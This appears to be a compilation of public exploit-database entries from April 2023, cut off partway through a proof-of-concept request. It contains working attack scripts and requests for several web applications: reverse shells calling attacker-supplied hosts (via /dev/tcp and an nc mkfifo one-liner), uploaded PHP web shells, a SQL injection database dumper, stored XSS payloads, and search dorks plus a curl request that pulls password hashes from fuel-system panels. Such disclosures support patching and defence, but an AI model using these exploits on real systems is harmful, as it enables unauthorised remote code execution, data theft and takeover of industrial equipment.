<pre><code># Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload<br /># Date: 21/04/2023<br /># Exploit Author: Mr Empy<br /># Software Link: https://github.com/kalcaddle/KodExplorer<br /># Version: <= 4.49<br /># Tested on: Linux<br /># References:<br /># * https://vuldb.com/?id.227000<br /># * https://www.cve.org/CVERecord?id=CVE-2022-4944<br /># * https://github.com/MrEmpy/CVE-2022-4944<br /><br />import argparse<br />import http.server<br />import socketserver<br />import os<br />import threading<br />import requests<br />from time import sleep<br /><br />def banner():<br /> print('''<br /> _ _____________ _____ _ ______ _____<br /> _____<br />| | / / _ | _ \ ___| | | | ___ \/ __ \|<br /> ___|<br />| |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/|<br />|__<br />| \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | |<br /> __|<br />| |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\|<br />|___<br />\_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_|<br />\____/\____/<br /> | |<br /><br /> |_|<br /><br /> [KODExplorer <= v4.49 Remote Code Executon]<br /> [Coded by MrEmpy]<br /><br />''')<br /><br />def httpd():<br /> port = 8080<br /> httpddir = os.path.join(os.path.dirname(__file__), 'http')<br /> os.chdir(httpddir)<br /> Handler = http.server.SimpleHTTPRequestHandler<br /> httpd = socketserver.TCPServer(('', port), Handler)<br /> print('[+] HTTP Server started')<br /> httpd.serve_forever()<br /><br /><br />def webshell(url, lhost):<br /> payload = '<pre><?php system($_GET["cmd"])?></pre>'<br /> path = '/data/User/admin/home/'<br /><br /> targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')<br /> wshell_f = open('http/shell.php', 'w')<br /> wshell_f.write(payload)<br /> wshell_f.close()<br /> print('[*] Opening HTTPd port')<br /> th = threading.Thread(target=httpd)<br /> th.start()<br /> print(f'[+] Send this URI to your target:<br />{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://<br />{lhost}:8080/shell.php&uuid=&time=')<br /> print(f'[+] After the victim opens the URI, his shell will be hosted at<br />{url}/data/User/admin/home/shell.php?cmd=whoami')<br /><br />def reverseshell(url, lhost):<br /> rvpayload = '<br />https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php<br />'<br /> path = '/data/User/admin/home/'<br /><br /> targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')<br /> lport = input('[*] Your local port: ')<br /> reqpayload = requests.get(rvpayload).text<br /> reqpayload = reqpayload.replace('127.0.0.1', lhost)<br /> reqpayload = reqpayload.replace('1234', lport)<br /> wshell_f = open('http/shell.php', 'w')<br /> wshell_f.write(reqpayload)<br /> wshell_f.close()<br /> print('[*] Opening HTTPd port')<br /> th = threading.Thread(target=httpd)<br /> th.start()<br /> print(f'[+] Send this URI to your target:<br />{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://<br />{lhost}:8080/shell.php&uuid=&time=')<br /> input(f'[*] Run the command "nc -lnvp {lport}" to receive the<br />connection and press any key\n')<br /> while True:<br /> hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')<br /> sleep(1)<br /> if not hitshell.status_code == 200:<br /> continue<br /> else:<br /> print('[+] Shell sent and executed!')<br /> break<br /><br /><br />def main(url, lhost, mode):<br /> banner()<br /> if mode == 'webshell':<br /> webshell(url, lhost)<br /> elif mode == 'reverse':<br /> reverseshell(url, lhost)<br /> else:<br /> print('[-] There is no such mode. Use webshell or reverse')<br /><br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('-u','--url', action='store', help='target url',<br />dest='url', required=True)<br /> parser.add_argument('-lh','--local-host', action='store', help='local<br />host', dest='lhost', required=True)<br /> parser.add_argument('-m','--mode', action='store', help='mode<br />(webshell, reverse)', dest='mode', required=True)<br /> arguments = parser.parse_args()<br /> main(arguments.url, arguments.lhost, arguments.mode)<br /></code></pre>
<pre><code># Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE)<br /># Date: 18/04/2023<br /># Exploit Author: Rodolfo Mariano<br /># Vendor Homepage: https://github.com/frangoteam/FUXA<br /># Version: FUXA V.1.1.13-1186 (current)<br /><br />from argparse import RawTextHelpFormatter<br />import argparse, sys, threading, requests<br /><br />def main(rhost, rport, lhost, lport):<br /> url = "http://"+rhost+":"+rport+"/api/runscript"<br /> payload = {<br /> "headers":<br /> {<br /> "normalizedNames":{},<br /> "lazyUpdate": "null"<br /> },<br /> "params":{<br /> "script":{<br /> "parameters":[<br /> {<br /> "name":"ok",<br /> "type":"tagid",<br /> "value":""<br /> }<br /> ],<br /> "mode":"",<br /> "id":"",<br /> "test":"true",<br /> "name":"ok",<br /> "outputId":"",<br /> "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)<br /> }<br /> }<br /> }<br /> response = requests.post(url, json=payload)<br />args = None<br />parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>")<br />parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')<br />parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)<br />parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')<br />parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')<br /><br />args=parser.parse_args()<br />main(args.rhost, args.rport, args.lhost, args.lport)<br /><br /></code></pre>
<pre><code>#!/usr/bin/python3<br /><br />#######################################################<br /># # <br /># Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #<br /># Date: 2023/04/13 #<br /># ExploitAuthor: msd0pe #<br /># Project: https://github.com/waqaskanju/Chitor-CMS #<br /># My Github: https://github.com/msd0pe-1 #<br /># Patched the 2023/04/16: 69d3442 commit #<br /># #<br />#######################################################<br /><br />__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'<br />__author__ = 'msd0pe'<br />__version__ = '1.1'<br />__date__ = '2023/04/13'<br /><br />class bcolors:<br /> PURPLE = '\033[95m'<br /> BLUE = '\033[94m'<br /> GREEN = '\033[92m'<br /> OCRA = '\033[93m'<br /> RED = '\033[91m'<br /> CYAN = '\033[96m'<br /> ENDC = '\033[0m'<br /> BOLD = '\033[1m'<br /> UNDERLINE = '\033[4m'<br /><br />class infos:<br /> INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "<br /> ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "<br /> GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "<br /> PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "<br /><br />import re<br />import requests<br />import optparse<br />from prettytable import PrettyTable<br /><br />def DumpTable(url, database, table):<br /> header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}<br /> x = PrettyTable()<br /> columns = []<br /> payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"<br /> u = requests.get(url + payload, headers=header)<br /> try:<br /> r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)<br /> r = r[0].replace('\"',"").split(',')<br /> if r == []:<br /> pass<br /> else:<br /> for i in r:<br /> columns.append(i)<br /> pass<br /> except:<br /> pass<br /> x.field_names = columns<br /> payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"<br /> u = requests.get(url + payload, headers=header)<br /> try:<br /> r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)<br /> r = r[0].replace('\"',"").split(',')<br /> if r == []:<br /> pass<br /> else:<br /> for i in r:<br /> i = i.split("xzmdpl")<br /> x.add_rows([i])<br /> except ValueError:<br /> r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)<br /> r = r[0].replace('\"',"").split(',')<br /> if r == []:<br /> pass<br /> else:<br /> for i in r:<br /> i = i.split("xzmdpl")<br /> i.append("")<br /> x.add_rows([i]) <br /> print(x)<br /><br />def ListTables(url, database):<br /> header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}<br /> x = PrettyTable()<br /> x.field_names = ["TABLES"]<br /> payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"<br /> u = requests.get(url + payload, headers=header)<br /> try:<br /> r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)<br /> r = r[0].replace('\"',"").split(',')<br /> if r == []:<br /> pass<br /> else:<br /> for i in r:<br /> x.add_row([i])<br /> except:<br /> pass<br /> print(x)<br /><br />def ListDatabases(url):<br /> header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}<br /> x = PrettyTable()<br /> x.field_names = ["DATABASES"]<br /> payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"<br /> u = requests.get(url + payload, headers=header)<br /> try:<br /> r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)<br /> r = r[0].replace('\"',"").split(',')<br /> if r == []:<br /> pass<br /> else:<br /> for i in r:<br /> x.add_row([i])<br /> except:<br /> pass<br /> print(x)<br /><br />def Main():<br /> Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)<br /> Menu.add_option('-u', '--url', type="str", dest="url", help='target url')<br /> Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')<br /> Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')<br /> Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')<br /> Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')<br /> Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')<br /> (options, args) = Menu.parse_args()<br /><br /> Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs<br /> python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables<br /> python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump<br /> """)<br /> Menu.add_option_group(Examples)<br /><br /> if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:<br /> Menu.print_help()<br /> print('')<br /> print(' %s' % __description__)<br /> print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)<br /> print(' Any malicious or illegal activity may be punishable by law')<br /> print(' Use at your own risk')<br /><br /> elif len(args) == 0:<br /> try:<br /> if options.url != None:<br /> if options.l_databases != None:<br /> ListDatabases(options.url)<br /> if options.database != None:<br /> if options.l_tables != None:<br /> ListTables(options.url, options.database)<br /> if options.table != None:<br /> if options.dump != None:<br /> DumpTable(options.url, options.database, options.table)<br /> except:<br /> print("Unexpected error")<br /><br />if __name__ == '__main__':<br /> try:<br /> Main()<br /><br /> except KeyboardInterrupt:<br /> print()<br /> print(infos.PROCESS + "Exiting...")<br /> print()<br /> exit(1)<br /> <br /><br /><br /></code></pre>
<pre><code>Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE)<br />Application: ProjeQtOr Project Management System<br />Version: 10.3.2<br />Bugs: Remote Code Execution (RCE) (Authenticated) via file upload<br />Technology: PHP<br />Vendor URL: https://www.projeqtor.org<br />Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download<br />Date of found: 19.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />Possible including php file with phar extension while uploading image. Rce is triggered when we visit again<br /><br />Payload:<?php echo system("id"); ?><br /><br />poc request:<br /><br /><br />POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1<br />Host: localhost<br />Content-Length: 1177<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />Accept: application/json<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />sec-ch-ua-platform: "Linux"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/projeqtor/view/main.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic<br />Connection: close<br /><br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"<br />Content-Type: application/octet-stream<br /><br /><?php echo system("id"); ?><br /><br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentId"<br /><br /><br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentRefType"<br /><br />User<br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentRefId"<br /><br />1<br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentType"<br /><br />file<br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="MAX_FILE_SIZE"<br /><br />10485760<br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentLink"<br /><br /><br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentDescription"<br /><br /><br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="attachmentPrivacy"<br /><br />1<br />------WebKitFormBoundaryY0bpJaQzcvQberWR<br />Content-Disposition: form-data; name="uploadType"<br /><br />html5<br />------WebKitFormBoundaryY0bpJaQzcvQberWR--<br /><br /><br /><br /><br />visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar<br /><br /></code></pre>
<pre><code>Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)<br />Application: Piwigo<br />Version: 13.6.0 <br />Bugs: Stored XSS<br />Technology: PHP<br />Vendor URL: https://piwigo.org/<br />Software Link: https://piwigo.org/get-piwigo<br />Date of found: 18.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image)<br />payload: <img%20src=x%20onerror=alert(4)><br /><br /><br />POST /piwigo/admin.php?page=photo-9 HTTP/1.1<br />Host: localhost<br />Content-Length: 159<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/piwigo/admin.php?page=photo-9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe<br />Connection: close<br /><br />name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings<br /><br /></code></pre>
<pre><code># Exploit Title: Franklin Fueling Systems TS-550 - Default Password<br /># Date: 4/16/2023<br /># Exploit Author: parsa rezaie khiabanloo<br /># Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)<br /># Version: TS-550<br /># Tested on: Linux/Android(termux)<br /><br />Step 1 : attacker can using these dorks and access to find the panel<br /><br />inurl:"relay_status.html"<br /><br />inurl:"fms_compliance.html"<br /><br />inurl:"fms_alarms.html"<br /><br />inurl:"system_status.html"<br /><br />inurl:"system_reports.html'<br /><br />inurl:"tank_status.html"<br /><br />inurl:"sensor_status.html"<br /><br />inurl:"tank_control.html"<br /><br />inurl:"fms_reports.html"<br /><br />inurl:"correction_table.html"<br /><br />Step 2 : attacker can send request <br /><br />curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi<br /><br /><br />Step 3 : if get response that show like this <br /><br /><TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION><br /> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/><br /> <ROLE_LIST><br /> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/><br /> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/><br /> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/><br /> </ROLE_LIST><br /><br /><br />Step 4 : attacker can crack the hashesh using john the ripper <br /><br />notice : most of the panels password is : admin<br /><br />Disclaimer:<br />The information provided in this advisory is provided "as is" without<br />warranty of any kind. Trustwave disclaims all warranties, either express or<br />implied, including the warranties of merchantability and fitness for a<br />particular purpose. In no event shall Trustwave or its suppliers be liable<br />for any damages whatsoever including direct, indirect, incidental,<br />consequential, loss of business profits or special damages, even if<br />Trustwave or its suppliers have been advised of the possibility of such<br />damages. Some states do not allow the exclusion or limitation of liability<br />for consequential or incidental damages so the foregoing limitation may not<br />apply.<br /><br /></code></pre>
<pre><code># Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information<br /># Date: 14 April, 2023<br /># Exploit Author: Rafael Cintra Lopes<br /># Vendor Homepage: https://swagger.io/<br /># Version: < 4.1.3<br /># CVE: CVE-2018-25031<br /># Site: https://rafaelcintralopes.com.br/<br /><br /># Usage: python swagger-exploit.py https://[swagger-page].com<br /><br />from selenium import webdriver<br />from selenium.webdriver.common.desired_capabilities import DesiredCapabilities<br />from selenium.webdriver.chrome.service import Service<br />import time<br />import json<br />import sys<br /><br />if __name__ == "__main__":<br /><br /> target = sys.argv[1]<br /><br /> desired_capabilities = DesiredCapabilities.CHROME<br /> desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}<br /><br /> options = webdriver.ChromeOptions()<br /> options.add_argument("--headless")<br /> options.add_argument("--ignore-certificate-errors")<br /> options.add_argument("--log-level=3")<br /> options.add_experimental_option("excludeSwitches", ["enable-logging"])<br /><br /> # Browser webdriver path<br /> drive_service = Service("C:/chromedriver.exe")<br /><br /> driver = webdriver.Chrome(service=drive_service,<br /> options=options,<br /> desired_capabilities=desired_capabilities)<br /><br /> driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")<br /> time.sleep(10)<br /> driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")<br /> time.sleep(10)<br /><br /> logs = driver.get_log("performance")<br /><br /> with open("log_file.json", "w", encoding="utf-8") as f:<br /> f.write("[")<br /><br /> for log in logs:<br /> log_file = json.loads(log["message"])["message"]<br /><br /> if("Network.response" in log_file["method"]<br /> or "Network.request" in log_file["method"]<br /> or "Network.webSocket" in log_file["method"]):<br /><br /> f.write(json.dumps(log_file)+",")<br /> f.write("{}]")<br /><br /> driver.quit()<br /><br /> json_file_path = "log_file.json"<br /> with open(json_file_path, "r", encoding="utf-8") as f:<br /> logs = json.loads(f.read())<br /><br /> for log in logs:<br /> try:<br /> url = log["params"]["request"]["url"]<br /><br /> if(url == "https://petstore.swagger.io/v2/hacked1.json"):<br /> print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")<br /> <br /> if(url == "https://petstore.swagger.io/v2/hacked2.json"):<br /> print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")<br /><br /> except Exception as e:<br /> pass<br /><br /></code></pre>
<pre><code>#!/usr/bin/env python<br /><br />"""<br /># Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)<br /># Google Dork: N/A<br /># Date: 2023-04-13<br /># Exploit Author: max / Zoltan Padanyi<br /># Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit<br /># Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download<br /># Version: 2.0.8<br /># Tested on: Debian 7.6<br /># CVE : N/A<br /><br />The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;<br /><br />Use at your own risk!<br /><br />RCA - wild exec is ongoing without any filtering<br /><br />in library/Net/Traceroute.php<br /><br /> 181 function _setTraceroutePath($sysname)<br /> 182 {<br /> 183 $status = '';<br /> 184 $output = array();<br /> 185 $traceroute_path = '';<br /> 186<br /> 187 if ("windows" == $sysname) {<br /> 188 return "tracert";<br /> 189 } else {<br /> 190 $traceroute_path = exec("which traceroute", $output, $status);<br /> [...]<br /> 257 function traceroute($host)<br /> 258 {<br /> 259<br /> 260 $argList = $this->_createArgList();<br /> 261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];<br /> 262 exec($cmd, $this->_result);<br /><br /><br />"""<br /><br />import requests<br />import argparse<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)<br />parser.add_argument("-i", "--ip", help="Listener IP", required=True)<br />parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)<br />args = parser.parse_args()<br /><br />rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"<br /><br />body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}<br /><br />try:<br /> r = requests.get(args.url)<br /> if r.ok:<br /> print("[+] URL looks good...moving forward...")<br /> print("[+] Sending exploit in...")<br /> r = requests.post(args.url,data=body)<br /> if r.ok:<br /> print("[+] Got HTTP 200, check your listener!")<br /> else:<br /> print("[-] Some kind of error happened, check the http response below!")<br /> print(r.text)<br />except Exception as e:<br /> print("General exception: " + str(e))<br /> <br /><br /></code></pre>
<pre><code>Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)<br />Author: Mirabbas Ağalarov<br />Application: Serendipity<br />Version: 2.4.0<br />Bugs: Stored XSS<br />Technology: PHP<br />Vendor URL: https://docs.s9y.org/<br />Software Link: https://docs.s9y.org/downloads.html<br />Date of found: 13.04.2023<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1.Anyone who has the authority to create the new entry can do this<br />payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E<br /><br /><br />POST /serendipity/serendipity_admin.php? HTTP/1.1<br />Host: localhost<br />Content-Length: 730<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b<br />Connection: close<br /><br />serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1<br /><br /><br /><br />2. visit the entry you created<br /><br /></code></pre>
<pre><code>Exploit Title: Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)<br />Application: Serendipity <br />Version: 2.4.0 <br />Bugs: Remote Code Execution (RCE) (Authenticated) via file upload<br />Technology: PHP<br />Vendor URL: https://docs.s9y.org/<br />Software Link: https://docs.s9y.org/downloads.html<br />Date of found: 13.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />If we load the poc.phar file in the image field while creating a category, we can run commands on the system.<br /><?php echo system("cat /etc/passwd"); ?><br /> I wrote a file with the above payload, a poc.phar extension, and uploaded it.<br /><br />Visit to http://localhost/serendipity/uploads/poc.phar<br /><br />poc request:<br /><br /><br />POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1<br />Host: localhost<br />Content-Length: 1561<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: iframe<br />Referer: 